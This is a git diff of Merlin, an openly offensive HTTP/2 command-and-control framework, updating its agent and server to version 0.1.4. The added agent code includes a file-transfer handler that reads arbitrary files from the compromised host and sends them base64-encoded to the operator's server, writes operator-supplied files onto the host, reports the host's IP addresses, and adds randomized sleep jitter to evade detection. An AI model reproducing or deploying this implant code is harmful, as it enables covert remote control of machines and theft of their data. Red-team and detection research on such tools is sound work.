diff --git a/.gitignore b/.gitignore
new file mode 100644
index 00000000..7aacdb10
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,6 @@
+.DS_STORE
+data/agents
+data/bin
+data/db
+data/log
+data/x509
diff --git a/Makefile b/Makefile
index ff1596e0..e857e977 100644
--- a/Makefile
+++ b/Makefile
@@ -1,20 +1,22 @@
 # !!!MAKE SURE YOUR GOPATH ENVIRONMENT VARIABLE IS SET FIRST!!!
 
 # Merlin Server & Agent version number
-VERSION=0.1.3
+VERSION=0.1.4
 
 MSERVER=merlinServer
 MAGENT=merlinAgent
 PASSWORD=merlin
 BUILD=$(shell git rev-parse HEAD)
 DIR=data/bin/v${VERSION}/
-LDFLAGS=-ldflags "-s -X main.version=${VERSION} -X main.build=${BUILD}"
-WINAGENTLDFLAGS=-ldflags "-s -X main.version=${VERSION} -X main.build=${BUILD} -H=windowsgui"
+LDFLAGS=-ldflags "-s -X main.build=${BUILD}"
+WINAGENTLDFLAGS=-ldflags "-s -X main.build=${BUILD} -H=windowsgui"
 PACKAGE=7za a -p${PASSWORD} -mhe -mx=9
-F=README.MD LICENSE data/README.MD data/agents/README.MD data/db/ data/log/README.MD data/x509 data/src data/bin/README.MD
+F=README.MD LICENSE data/modules docs data/README.MD data/agents/README.MD data/db/ data/log/README.MD data/x509 data/src data/bin/README.MD
 F2=LICENSE
 W=Windows-x64
 L=Linux-x64
+A=Linux-arm
+M=Linux-mips
 D=Darwin-x64
 
 # Make Directory to store executables
@@ -31,6 +33,12 @@ windows: server-windows agent-windows
 # Compile Linux binaries
 linux: server-linux agent-linux
 
+# Compile Arm binaries
+arm: agent-arm
+
+# Compile mips binaries
+mips: agent-mips
+
 # Compile Darwin binaries
 darwin: server-darwin agent-darwin
 
@@ -46,6 +54,14 @@ agent-windows:
 server-linux:
 	export GOOS=linux;export GOARCH=amd64;go build ${LDFLAGS} -o ${DIR}/${MSERVER}-${L} cmd/merlinserver/main.go
 
+# Compile Agent - Linux mips
+agent-mips:
+	export GOOS=linux;export GOARCH=mips;go build ${LDFLAGS} -o ${DIR}/${MAGENT}-${M} cmd/merlinagent/main.go
+
+# Compile Agent - Linux arm
+agent-arm:
+	export GOOS=linux;export GOARCH=arm;export GOARM=7;go build ${LDFLAGS} -o ${DIR}/${MAGENT}-${A} cmd/merlinagent/main.go
+
 # Compile Agent - Linux x64
 agent-linux:
 	export GOOS=linux;export GOARCH=amd64;go build ${LDFLAGS} -o ${DIR}/${MAGENT}-${L} cmd/merlinagent/main.go
diff --git a/README.MD b/README.MD
index 4ff2fb49..a799e34e 100644
--- a/README.MD
+++ b/README.MD
@@ -1,5 +1,8 @@
 [![GoReportCard](https://goreportcard.com/badge/github.com/ne0nd0g/merlin)](https://goreportcard.com/badge/github.com/ne0nd0g/merlin)
 [![License: GPL v3](https://img.shields.io/badge/License-GPL%20v3-blue.svg)](https://www.gnu.org/licenses/gpl-3.0)
+[![Release](https://img.shields.io/github/release/Ne0nd0g/merlin.svg)](https://github.com/Ne0nd0g/merlin/releases/latest)
+[![Downloads](https://img.shields.io/github/downloads/Ne0nd0g/merlin/total.svg)](https://github.com/Ne0nd0g/merlin/releases)
+[![Slack](https://img.shields.io/badge/Slack-Sign--Up-blue.svg)](https://communityinviter.com/apps/merlin-go/merlin)
 
 # Merlin (BETA)
 Merlin is a cross-platform post-exploitation HTTP/2 Command & Control 
@@ -9,7 +12,7 @@ An introductory blog post can be found here:
 https://medium.com/@Ne0nd0g/introducing-merlin-645da3c635a
 
 
-[![asciicast](https://asciinema.org/a/ryljo8qNjHz1JFcFDK7wP6e9I.png)](https://asciinema.org/a/ryljo8qNjHz1JFcFDK7wP6e9I)
+[![asciicast](https://asciinema.org/a/166722.png)](https://asciinema.org/a/166722&speed=2)
 
 ## Getting Started
 The quickest and easiest way to start using Merlin is download the
@@ -73,32 +76,57 @@ Merlin is equipped with a tab completion system that can be used to see
 what commands are available at any given time. Hit double tab to get a
 list of all available commands.
 
-```
-
-exit    Exit and close Merlin
-
-help   Show Merlin help menu
-
-quit    Exit and close Merlin
-
-?      Show Merlin help menu
-```
+ Name   | Description
+ ---    | ---
+ agent   | Interact with agents or list agents
+ banner | Print the Merlin banner
+ exit   | Exit and close the Merlin server
+ help   | Print help screen
+ interact | Interact with an agent. Alias for Empire users
+ quit   | Exit and close the Merlin server
+ sessions | List all agents session information. Alias for MSF users
+ use    | Use a function of Merlin (i.e modules)
+ version | Print the Merlin server version
+ ?      | Print help screen
+ `*`    | Anything else will be execute on the host operating system
 
 ## Agent Commands
 These are the commands to control an agent from the server. Tab
 completion can be used to select an Agent's identifier.
 
-```
-agent cmd <agent id> <command>       A command to run on a remote agent
-
-agent control <agent id> <command>  Configure/Control a remote agent (not the host)
-                [kill,sleep,padding,maxretry]
-
-agent info <agent id>               Display all information for an agent
-
-agent list                          List agents
-
-```
+ Name   | Description
+ ---    | ---
+ cmd   | Execute a command on the agent", "cmd ping -c 3 8.8.8.8"
+ back   | Return to the main menu
+ download | Download a file from the agent
+ exit   | Exit and close the Merlin server
+ help   | Print help screen
+ info | Display all information about the agent
+ kill | Instruct the agent to die or quit
+ main | Return to the main menu
+ quit   | Exit and close the Merlin server
+ set | Set the value for one of the agent's options (maxretry, padding, skew, sleep)
+ show | Show information about a module or its options (show options or show info)
+ upload | Upload a file to the agent
+  ?      | Print help screen
+  `*`    | Anything else will be execute on the host operating system
+
+## Module Commands
+These are the commands to configure and execute a module. Tab completion
+ can be used to select options and agents.
+
+ Name   | Description
+ ---    | ---
+ back   | Return to the main menu
+ exit   | Exit and close the Merlin server
+ help   | Print help screen
+ main | Return to the main menu
+ quit   | Exit and close the Merlin server
+ run | Run or execute the module
+ set | Set the value for one of the module's options
+ show | Show information about a module or its options (show options or show info)
+ ?      | Print help screen
+ `*`    | Anything else will be execute on the host operating system
 
 ### TLS Certificates
 By default, Merlin will load server.crt and server.key from the
@@ -140,7 +168,9 @@ Run Merlin Agent as script: `go run cmd/merlinagent/main.go`
         Enable debug output
   -sleep duration
         Time for agent to sleep (default 10s)
+  -skew int
+        Variable time skew for agent to sleep
   -url string
         Full URL for agent to connect to (default "https://127.0.0.1:443")
   -v    Enable verbose output
-```
\ No newline at end of file
+```
diff --git a/cmd/merlinagent/main.go b/cmd/merlinagent/main.go
index 7c4df4ac..261d0786 100644
--- a/cmd/merlinagent/main.go
+++ b/cmd/merlinagent/main.go
@@ -1,6 +1,6 @@
 // Merlin is a post-exploitation command and control framework.
 // This file is part of Merlin.
-// Copyright (C) 2017  Russel Van Tuyl
+// Copyright (C) 2018  Russel Van Tuyl
 
 // Merlin is free software: you can redistribute it and/or modify
 // it under the terms of the GNU General Public License as published by
@@ -18,23 +18,33 @@
 package main
 
 import (
+	// Standard
 	"bytes"
 	"crypto/tls"
+	"encoding/base64"
 	"encoding/json"
 	"flag"
 	"fmt"
+	"io/ioutil"
 	"math/rand"
+	"net"
 	"net/http"
 	"os"
 	"os/user"
 	"runtime"
 	"strconv"
 	"time"
+	"crypto/sha1"
+	"io"
+	"path/filepath"
 
+	// 3rd Party
 	"github.com/fatih/color"
 	"github.com/satori/go.uuid"
 	"golang.org/x/net/http2"
 
+	// Merlin
+	"github.com/Ne0nd0g/merlin/pkg"
 	"github.com/Ne0nd0g/merlin/pkg/agent"
 	"github.com/Ne0nd0g/merlin/pkg/messages"
 )
@@ -47,11 +57,11 @@ var mRun = true
 var hostUUID = uuid.NewV4()
 var url = "https://127.0.0.1:443/"
 var h2Client = getH2WebClient()
+var waitSkew int64 = 30000
 var waitTime = 30000 * time.Millisecond
 var agentShell = ""
 var paddingMax = 4096
 var src = rand.NewSource(time.Now().UnixNano())
-var version = "nonRelease"
 var build = "nonRelease"
 var maxRetry = 7
 var failedCheckin = 0
@@ -70,12 +80,15 @@ func main() {
 	flag.BoolVar(&verbose, "v", false, "Enable verbose output")
 	flag.BoolVar(&debug, "debug", false, "Enable debug output")
 	flag.StringVar(&url, "url", url, "Full URL for agent to connect to")
+	flag.Int64Var(&waitSkew, "skew", 3000, "Variable time skew for agent to sleep")
 	flag.DurationVar(&waitTime, "sleep", 30000*time.Millisecond, "Time for agent to sleep")
 	flag.Usage = usage
 	flag.Parse()
 
+	rand.Seed(time.Now().UTC().UnixNano())
+
 	if verbose {
-		color.Yellow("[-]Agent version: %s", version)
+		color.Yellow("[-]Agent version: %s", merlin.Version)
 		color.Yellow("[-]Agent build: %s", build)
 	}
 
@@ -94,10 +107,12 @@ func main() {
 		if failedCheckin >= maxRetry {
 			os.Exit(1)
 		}
+		timeSkew := time.Duration(rand.Int63n(waitSkew)) * time.Millisecond
+		totalWaitTime := waitTime + timeSkew
 		if verbose {
-			color.Yellow("[-]Sleeping for %s at %s", waitTime.String(), time.Now())
+			color.Yellow("[-]Sleeping for %s at %s", totalWaitTime.String(), time.Now())
 		}
-		time.Sleep(waitTime)
+		time.Sleep(totalWaitTime)
 	}
 }
 
@@ -118,6 +133,24 @@ func initialCheckIn(host string, client *http.Client) bool {
 		}
 	}
 
+	var ips []string
+	interfaces, errI := net.Interfaces()
+	if errI == nil {
+		for _, iface := range interfaces {
+			addrs, err := iface.Addrs()
+			if err == nil {
+				for _, addr := range addrs {
+					ips = append(ips, addr.String())
+				}
+			}
+		}
+	} else {
+		if debug {
+			color.Red("[!]There was an error getting the the IP addresses")
+			color.Red(errI.Error())
+		}
+	}
+
 	if verbose {
 		color.Green("[+]Host Information:")
 		color.Green("\tAgent UUID: %s", hostUUID)
@@ -127,6 +160,7 @@ func initialCheckIn(host string, client *http.Client) bool {
 		color.Green("\tUser GUID: %s", u.Gid)
 		color.Green("\tHostname: %s", h)
 		color.Green("\tPID: %d", os.Getpid())
+		color.Green("\tIPs: %v", ips)
 	}
 
 	// JSON "initial" payload object
@@ -137,6 +171,7 @@ func initialCheckIn(host string, client *http.Client) bool {
 		UserGUID:     u.Gid,
 		HostName:     h,
 		Pid:          os.Getpid(),
+		Ips:          ips,
 	}
 
 	payload, errP := json.Marshal(i)
@@ -258,6 +293,129 @@ func statusCheckIn(host string, client *http.Client) {
 			color.Green("%s Message Type Received!", j.Type)
 		}
 		switch j.Type { // TODO add self destruct that will find the .exe current path and start a new process to delete it after initial sleep
+		case "FileTransfer":
+			var p messages.FileTransfer
+			json.Unmarshal(payload, &p)
+
+			g := messages.Base{
+				Version: 1.0,
+				ID:      j.ID,
+				Padding: randStringBytesMaskImprSrc(paddingMax),
+			}
+
+			// Agent will be downloading a file from the server
+			if p.IsDownload {
+				if verbose {color.Green("FileTransfer type: Download")}
+				// Setup the message to submit the status of the upload
+				c := messages.CmdResults{
+					Job:    p.Job,
+					Stdout: "",
+					Stderr: "",
+				}
+
+				d, _ := filepath.Split(p.FileLocation)
+				_, directoryPathErr := os.Stat(d)
+				if directoryPathErr != nil {
+					if verbose {
+						color.Red("[!]There was an error getting the FileInfo structure for the directory %s", d)
+						color.Red(directoryPathErr.Error())
+					}
+					c.Stderr = fmt.Sprintf("[!]There was an error getting the FileInfo structure for the " +
+						"remote directory %s:\r\n", p.FileLocation)
+					c.Stderr += fmt.Sprintf(directoryPathErr.Error())
+				}
+				if c.Stderr == "" {
+					if verbose {
+						color.Yellow("[-]Writing file to %s", p.FileLocation)
+					}
+					downloadFile, downloadFileErr := base64.StdEncoding.DecodeString(p.FileBlob)
+					if downloadFileErr != nil {
+						c.Stderr = downloadFileErr.Error()
+						if verbose {
+							color.Red("[!]There was an error decoding the fileBlob")
+							color.Red(downloadFileErr.Error())
+						}
+					} else {
+						errF := ioutil.WriteFile(p.FileLocation, downloadFile, 0644)
+						if errF != nil {
+							c.Stderr = err.Error()
+							if verbose {
+								color.Red("[!]There was an error writing to : %s", p.FileLocation)
+								color.Red(errF.Error())
+							}
+						} else {
+							if verbose {
+								color.Green("[+]Successfully download file to %s", p.FileLocation)
+							}
+							c.Stdout = fmt.Sprintf("Successfully uploaded file to %s on agent", p.FileLocation)
+						}
+					}
+				}
+
+				k, _ := json.Marshal(c)
+				g.Type = "CmdResults"
+				g.Payload = (*json.RawMessage)(&k)
+			}
+
+			// Agent will uploading a file to the server
+			if !p.IsDownload {
+				if verbose {color.Green("FileTransfer type: Upload")}
+
+				fileData, fileDataErr := ioutil.ReadFile(p.FileLocation)
+				if fileDataErr != nil {
+					if verbose {
+						color.Red("[!]There was an error reading %s", p.FileLocation)
+						color.Red(fileDataErr.Error())
+					}
+					errMessage := fmt.Sprintf("[!]There was an error reading %s\r\n", p.FileLocation)
+					errMessage += fileDataErr.Error()
+					c := messages.CmdResults{
+						Job:    p.Job,
+						Stderr: errMessage,
+					}
+					if verbose {
+						color.Yellow("[-]Sending error message to sever.")
+					}
+					k, _ := json.Marshal(c)
+					g.Type = "CmdResults"
+					g.Payload = (*json.RawMessage)(&k)
+
+				} else {
+					fileHash := sha1.New()
+					io.WriteString(fileHash, string(fileData))
+
+					if verbose {
+						color.Yellow("[-]Uploading file %s of size %d bytes and a SHA1 hash of %x to the server",
+							p.FileLocation,
+							len(fileData),
+							fileHash.Sum(nil))
+					}
+					c := messages.FileTransfer{
+						FileLocation: p.FileLocation,
+						FileBlob:     base64.StdEncoding.EncodeToString([]byte(fileData)),
+						IsDownload:   true,
+						Job:          p.Job,
+					}
+
+					k, _ := json.Marshal(c)
+					g.Type = "FileTransfer"
+					g.Payload = (*json.RawMessage)(&k)
+
+				}
+			}
+			b2 := new(bytes.Buffer)
+			json.NewEncoder(b2).Encode(g)
+			resp2, respErr := client.Post(host, "application/json; charset=utf-8", b2)
+			if respErr != nil {
+				if verbose {
+					color.Red("There was an error sending the FileTransfer message to the server")
+					color.Red(respErr.Error())
+				}
+			}
+			if resp2.StatusCode != 200 {
+				color.Red("Message error from server. HTTP Status code: %d", resp2.StatusCode)
+			}
+
 		case "CmdPayload":
 			var p messages.CmdPayload
 			json.Unmarshal(payload, &p)
@@ -323,6 +481,18 @@ func statusCheckIn(host string, client *http.Client) {
 						color.Red("The provided time was: %s", t.String())
 					}
 				}
+			case "skew":
+				t, err := strconv.ParseInt(p.Args, 10, 64)
+				if err != nil {
+					if verbose {
+						color.Red("[!]There was an error changing the agent skew interval")
+					}
+				}
+				if verbose {
+					color.Yellow("[-]Setting agent skew interval to %d", t)
+				}
+				waitSkew = t
+				agentInfo(host, client)
 			case "padding":
 				t, err := strconv.Atoi(p.Args)
 				if err != nil {
@@ -439,12 +609,13 @@ func randStringBytesMaskImprSrc(n int) string {
 
 func agentInfo(host string, client *http.Client) {
 	i := messages.AgentInfo{
-		Version:       version,
+		Version:       merlin.Version,
 		Build:         build,
 		WaitTime:      waitTime.String(),
 		PaddingMax:    paddingMax,
 		MaxRetry:      maxRetry,
 		FailedCheckin: failedCheckin,
+		Skew:		   waitSkew,
 	}
 
 	payload, errP := json.Marshal(i)
@@ -514,3 +685,5 @@ func agentInfo(host string, client *http.Client) {
 // TODO set message jitter
 // TODO get and return IP addresses with initial checkin
 // TODO Update Makefile to remove debug stacktrace for agents only. GOTRACEBACK=0 #https://dave.cheney.net/tag/gotraceback https://golang.org/pkg/runtime/debug/#SetTraceback
+// TODO Add standard function for printing messages like in the JavaScript agent. Make it a lib for agent and server?
+// TODO send cmdResult for agentcontrol messages
diff --git a/cmd/merlinserver/main.go b/cmd/merlinserver/main.go
index f19e44ba..5af7377e 100644
--- a/cmd/merlinserver/main.go
+++ b/cmd/merlinserver/main.go
@@ -1,6 +1,6 @@
 // Merlin is a post-exploitation command and control framework.
 // This file is part of Merlin.
-// Copyright (C) 2017  Russel Van Tuyl
+// Copyright (C) 2018  Russel Van Tuyl
 
 // Merlin is free software: you can redistribute it and/or modify
 // it under the terms of the GNU General Public License as published by
@@ -19,751 +19,51 @@ package main
 
 import (
 	// Standard
-	"crypto/tls"
-	"encoding/base64"
-	"encoding/json"
 	"flag"
-	"fmt"
-	"io"
-	"log"
-	"math/rand"
-	"net/http"
-	"os"
 	"path/filepath"
 	"strconv"
-	"strings"
-	"time"
 
 	// 3rd Party
-	"github.com/chzyer/readline"
 	"github.com/fatih/color"
-	"github.com/olekukonko/tablewriter"
-	"github.com/satori/go.uuid"
 
 	// Merlin
-	"github.com/Ne0nd0g/merlin/pkg"
 	"github.com/Ne0nd0g/merlin/pkg/banner"
-	"github.com/Ne0nd0g/merlin/pkg/messages"
+	"github.com/Ne0nd0g/merlin/pkg/servers/http2"
+	"github.com/Ne0nd0g/merlin/pkg/logging"
+	"github.com/Ne0nd0g/merlin/pkg/core"
+	"github.com/Ne0nd0g/merlin/pkg/cli"
+	"github.com/Ne0nd0g/merlin/pkg"
 )
 
 // Global Variables
-
-var debug = false
-var verbose = false
-var src = rand.NewSource(time.Now().UnixNano())
-var currentDir, _ = os.Getwd()
-var agents = make(map[uuid.UUID]*agent) //global map to house agent objects
-var paddingMax = 4096
-var version = "nonRelease"
 var build = "nonRelease"
-var serverLog *os.File
-
-// Constants
-
-const (
-	letterIdxBits = 6                    // 6 bits to represent a letter index
-	letterIdxMask = 1<<letterIdxBits - 1 // All 1-bits, as many as letterIdxBits
-	letterIdxMax  = 63 / letterIdxBits   // # of letter indices fitting in 63 bits
-	letterBytes   = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
-)
 
 func main() {
+	logging.Server("Starting Merlin Server")
 
-	// Server Logging
-
-	if _, err := os.Stat(filepath.Join(currentDir, "data", "log", "merlinServerLog.txt")); os.IsNotExist(err) {
-		os.Mkdir(filepath.Join(currentDir, "data", "log"), os.ModeDir)
-		os.Create(filepath.Join(currentDir, "data", "log", "merlinServerLog.txt"))
-		if debug {
-			color.Red("[DEBUG]Created server log file at: %s\\data\\log\\merlinServerLog.txt", currentDir)
-		}
-	}
-	var errLog error
-	serverLog, errLog = os.OpenFile(filepath.Join(currentDir, "data", "log", "merlinServerLog.txt"), os.O_APPEND|os.O_WRONLY, 0600)
-	if errLog != nil {
-		color.Red("[!]There was an error with the Merlin Server log file")
-		fmt.Println(errLog)
-	}
-	serverLog.WriteString(fmt.Sprintf("[%s]Starting Merlin Server\r\n", time.Now()))
-
-	flag.BoolVar(&verbose, "v", false, "Enable verbose output")
-	flag.BoolVar(&debug, "debug", false, "Enable debug output")
+	flag.BoolVar(&core.Verbose, "v", false, "Enable verbose output")
+	flag.BoolVar(&core.Debug, "debug", false, "Enable debug output")
 	port := flag.Int("p", 443, "Merlin Server Port")
 	ip := flag.String("i", "0.0.0.0", "The IP address of the interface to bind to")
-	crt := flag.String("x509cert", filepath.Join(string(currentDir), "data", "x509", "server.crt"),
+	crt := flag.String("x509cert", filepath.Join(string(core.CurrentDir), "data", "x509", "server.crt"),
 		"The x509 certificate for the HTTPS listener")
-	key := flag.String("x509key", filepath.Join(string(currentDir), "data", "x509", "server.key"),
+	key := flag.String("x509key", filepath.Join(string(core.CurrentDir), "data", "x509", "server.key"),
 		"The x509 certificate key for the HTTPS listener")
 	flag.Usage = func() {
 		color.Blue("#################################################")
 		color.Blue("#\t\tMERLIN SERVER\t\t\t#")
 		color.Blue("#################################################")
-		color.Blue("Version: " + version + " Build: " + build)
+		color.Blue("Version: " + merlin.Version + " Build: " + build)
 		flag.PrintDefaults()
 	}
 	flag.Parse()
 
 	color.Blue(banner.Banner1)
-	color.Blue("\t\t   Version: %s", version)
+	color.Blue("\t\t   Version: %s", merlin.Version)
 	color.Blue("\t\t   Build: %s", build)
 
-	go startListener(strconv.Itoa(*port), *ip, *crt, *key, "/")
-	shell()
-}
-
-func httpHandler(w http.ResponseWriter, r *http.Request) {
-	if verbose {
-		color.Yellow("[-]Received HTTP %s Connection from %s", r.Method, r.Host)
-		serverLog.WriteString(fmt.Sprintf("[%s]Received HTTP %s Connection from %s\r\n", time.Now(),
-			r.Method, r.Host))
-	}
-
-	if debug {
-		color.Red("\n[DEBUG]HTTP Connection Details:")
-		color.Red("[DEBUG]Host: %s", r.Host)
-		color.Red("[DEBUG]URI: %s", r.RequestURI)
-		color.Red("[DEBUG]Method: %s", r.Method)
-		color.Red("[DEBUG]Protocol: %s", r.Proto)
-		color.Red("[DEBUG]Headers: %s", r.Header)
-		color.Red("[DEBUG]TLS Negotiated Protocol: %s", r.TLS.NegotiatedProtocol)
-		color.Red("[DEBUG]TLS Cipher Suite: %d", r.TLS.CipherSuite)
-		color.Red("[DEBUG]TLS Server Name: %s", r.TLS.ServerName)
-		color.Red("[DEBUG]Content Length: %d", r.ContentLength)
-
-		serverLog.WriteString(fmt.Sprintf("[%s][DEBUG]HTTP Connection Details:\r\n", time.Now()))
-		serverLog.WriteString(fmt.Sprintf("[%s][DEBUG]Host: %s\r\n", time.Now(), r.Host))
-		serverLog.WriteString(fmt.Sprintf("[%s][DEBUG]URI: %s\r\n", time.Now(), r.RequestURI))
-		serverLog.WriteString(fmt.Sprintf("[%s][DEBUG]Method: %s\r\n", time.Now(), r.Method))
-		serverLog.WriteString(fmt.Sprintf("[%s][DEBUG]Protocol: %s\r\n", time.Now(), r.Proto))
-		serverLog.WriteString(fmt.Sprintf("[%s][DEBUG]Headers: %s\r\n", time.Now(), r.Header))
-		serverLog.WriteString(fmt.Sprintf("[%s][DEBUG]TLS Negotiated Protocol: %s\r\n", time.Now(),
-			r.TLS.NegotiatedProtocol))
-		serverLog.WriteString(fmt.Sprintf("[%s][DEBUG]TLS Cipher Suite: %d\r\n", time.Now(), r.TLS.CipherSuite))
-		serverLog.WriteString(fmt.Sprintf("[%s][DEBUG]TLS Server Name: %s\r\n", time.Now(), r.TLS.ServerName))
-		serverLog.WriteString(fmt.Sprintf("[%s][DEBUG]Content Length: %d\r\n", time.Now(), r.ContentLength))
-	}
-
-	if r.Method == "POST" && r.ProtoMajor == 2 {
-
-		var payload json.RawMessage
-		j := messages.Base{
-			Payload: &payload,
-		}
-		json.NewDecoder(r.Body).Decode(&j)
-
-		if debug {
-			color.Red("[DEBUG]POST DATA: %s", j)
-		}
-		switch j.Type {
-
-		case "InitialCheckIn":
-			var p messages.SysInfo
-			json.Unmarshal(payload, &p)
-			agentInitialCheckIn(j, p)
-
-		case "StatusCheckIn":
-			w.Header().Set("Content-Type", "application/json")
-			x := statusCheckIn(j)
-			if verbose {
-				color.Yellow("[-]Sending " + x.Type + " message type to agent")
-			}
-			json.NewEncoder(w).Encode(x)
-
-		case "CmdResults":
-			// TODO move to its own function
-			var p messages.CmdResults
-			json.Unmarshal(payload, &p)
-			agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Results for job: %s\r\n", time.Now(), p.Job))
-
-			color.Cyan("[+]Results for job %s", p.Job)
-			if len(p.Stdout) > 0 {
-				agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Command Results (stdout):\r\n%s\r\n",
-					time.Now(),
-					p.Stdout))
-				color.Green("%s", p.Stdout)
-			}
-			if len(p.Stderr) > 0 {
-				agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Command Results (stderr):\r\n%s\r\n",
-					time.Now(),
-					p.Stderr))
-				color.Red("%s", p.Stderr)
-			}
-
-		case "AgentInfo":
-			var p messages.AgentInfo
-			json.Unmarshal(payload, &p)
-			agentInfo(j, p)
-
-		default:
-			color.Red("[!]Invalid Activity: %s", j.Type)
-		}
-
-	} else if r.Method == "GET" {
-		// Should answer any GET requests
-		// Send 404
-		w.WriteHeader(404)
-	} else {
-		w.WriteHeader(404)
-	}
-}
-
-func startListener(port string, ip string, crt string, key string, webpath string) {
-
-	serverLog.WriteString(fmt.Sprintf("[%s]Starting HTTP/2 Listener \r\n", time.Now()))
-	serverLog.WriteString(fmt.Sprintf("[%s]Address: %s:%s%s\r\n", time.Now(), ip, port, webpath))
-	serverLog.WriteString(fmt.Sprintf("[%s]x.509 Certificate %s\r\n", time.Now(), crt))
-	serverLog.WriteString(fmt.Sprintf("[%s]x.509 Key %s\r\n", time.Now(), key))
-
-	time.Sleep(45 * time.Millisecond) // Sleep to allow the shell to start up
-	// Check to make sure files exist
-	_, errCrt := os.Stat(crt)
-	if errCrt != nil {
-		color.Red("[!]There was an error importing the SSL/TLS x509 certificate")
-		serverLog.WriteString(fmt.Sprintf("[%s]There was an error importing the SSL/TLS x509 certificate\r\n",
-			time.Now()))
-		fmt.Println(errCrt)
-		return
-	}
-
-	_, errKey := os.Stat(key)
-	if errKey != nil {
-		color.Red("[!]There was an error importing the SSL/TLS x509 key")
-		serverLog.WriteString(fmt.Sprintf("[%s]There was an error importing the SSL/TLS x509 key\r\n",
-			time.Now()))
-		fmt.Println(errKey)
-		return
-	}
-
-	cer, err := tls.LoadX509KeyPair(crt, key)
-
-	if err != nil {
-		color.Red("[!]There was an error importing the SSL/TLS x509 key pair")
-		color.Red("[!]Ensure a keypair is located in the data/x509 directory")
-		serverLog.WriteString(fmt.Sprintf("[%s]There was an error importing the SSL/TLS x509 key pair\r\n",
-			time.Now()))
-		fmt.Println(err)
-		return
-	}
-
-	// Configure TLS
-	config := &tls.Config{
-		Certificates: []tls.Certificate{cer},
-		MinVersion:   tls.VersionTLS12,
-		CipherSuites: []uint16{
-			tls.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,
-			tls.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384,
-			tls.TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,
-		},
-		NextProtos: []string{"h2"},
-	}
-	http.HandleFunc(webpath, httpHandler)
-
-	s := &http.Server{
-		Addr:           ip + ":" + port,
-		Handler:        nil,
-		ReadTimeout:    10 * time.Second,
-		WriteTimeout:   10 * time.Second,
-		MaxHeaderBytes: 1 << 20,
-		TLSConfig:      config,
-	}
-
-	// I shouldn't need to specify the certs as they are in the config
-	color.Yellow("[-]HTTPS Listener Started on %s:%s", ip, port)
-	err2 := s.ListenAndServeTLS(crt, key)
-	if err2 != nil {
-		color.Red("[!]There was an error starting the web server")
-		serverLog.WriteString(fmt.Sprintf("[%s]There was an error starting the web server\r\n", time.Now()))
-		fmt.Println(err2)
-		return
-	}
-	// TODO determine scripts path and load certs by their absolute path
-}
-
-func agentInitialCheckIn(j messages.Base, p messages.SysInfo) {
-	color.Green("[+]Received new agent checkin from %s", j.ID)
-	serverLog.WriteString(fmt.Sprintf("[%s]Received new agent checkin from %s\r\n", time.Now(), j.ID))
-	if verbose {
-		color.Yellow("\t[i]Host ID: %s", j.ID)
-		color.Yellow("\t[i]Activity: %s", j.Type)
-		color.Yellow("\t[i]Payload: %s", j.Payload)
-		color.Yellow("\t[i]Platform: %s", p.Platform)
-		color.Yellow("\t[i]Architecture: %s", p.Architecture)
-		color.Yellow("\t[i]Username: %s", p.UserName)
-	}
-	agentsDir := filepath.Join(currentDir, "data", "agents")
-
-	if _, errD := os.Stat(agentsDir); os.IsNotExist(errD) {
-		os.Mkdir(agentsDir, os.ModeDir)
-	}
-	if _, err := os.Stat(filepath.Join(agentsDir, j.ID.String())); os.IsNotExist(err) {
-		os.Mkdir(filepath.Join(agentsDir, j.ID.String()), os.ModeDir)
-		os.Create(filepath.Join(agentsDir, j.ID.String(), "agent_log.txt"))
-
-		if verbose {
-			color.Yellow("[-]Created agent log file at: %s", agentsDir, j.ID.String(), "agent_log.txt")
-		}
-	}
-
-	f, err := os.OpenFile(filepath.Join(agentsDir, j.ID.String(), "agent_log.txt"), os.O_APPEND|os.O_WRONLY, 0600)
-	if err != nil {
-		panic(err)
-	}
-	// Add custom agent struct to global agents map
-	agents[j.ID] = &agent{id: j.ID, userName: p.UserName, userGUID: p.UserGUID, platform: p.Platform,
-		architecture: p.Architecture,
-		hostName:     p.HostName, pid: p.Pid, channel: make(chan []string, 10),
-		agentLog: f, iCheckIn: time.Now(), sCheckIn: time.Now()}
-
-	agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Initial check in for agent %s\r\n", time.Now(), j.ID))
-	agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Platform: %s\r\n", time.Now(), p.Platform))
-	agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Architecture: %s\r\n", time.Now(), p.Architecture))
-	agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]HostName: %s\r\n", time.Now(), p.HostName))
-	agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]UserName: %s\r\n", time.Now(), p.UserName))
-	agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]UserGUID: %s\r\n", time.Now(), p.UserGUID))
-	agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Process ID: %d\r\n", time.Now(), p.Pid))
-
-	// Add code here to create db record
-}
-
-func agentInfo(j messages.Base, p messages.AgentInfo) {
-	_, ok := agents[j.ID]
-
-	if !ok {
-		color.Red("[!]The agent was not found while processing an AgentInfo message")
-		return
-	}
-	if debug {
-		color.Red("[DEBUG]Processing new agent info")
-		color.Red("\t[DEBUG]Agent Version: %s", p.Version)
-		color.Red("\t[DEBUG]Agent Build: %s", p.Build)
-		color.Red("\t[DEBUG]Agent waitTime: %s", p.WaitTime)
-		color.Red("\t[DEBUG]Agent paddingMax: %d", p.PaddingMax)
-		color.Red("\t[DEBUG]Agent maxRetry: %d", p.MaxRetry)
-		color.Red("\t[DEBUG]Agent failedCheckin: %d", p.FailedCheckin)
-	}
-	agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Processing AgentInfo message:\r\n", time.Now()))
-	agents[j.ID].agentLog.WriteString(fmt.Sprintf("\tAgent Version: %s \r\n", p.Version))
-	agents[j.ID].agentLog.WriteString(fmt.Sprintf("\tAgent Build: %s \r\n", p.Build))
-	agents[j.ID].agentLog.WriteString(fmt.Sprintf("\tAgent waitTime: %s \r\n", p.WaitTime))
-	agents[j.ID].agentLog.WriteString(fmt.Sprintf("\tAgent paddingMax: %d \r\n", p.PaddingMax))
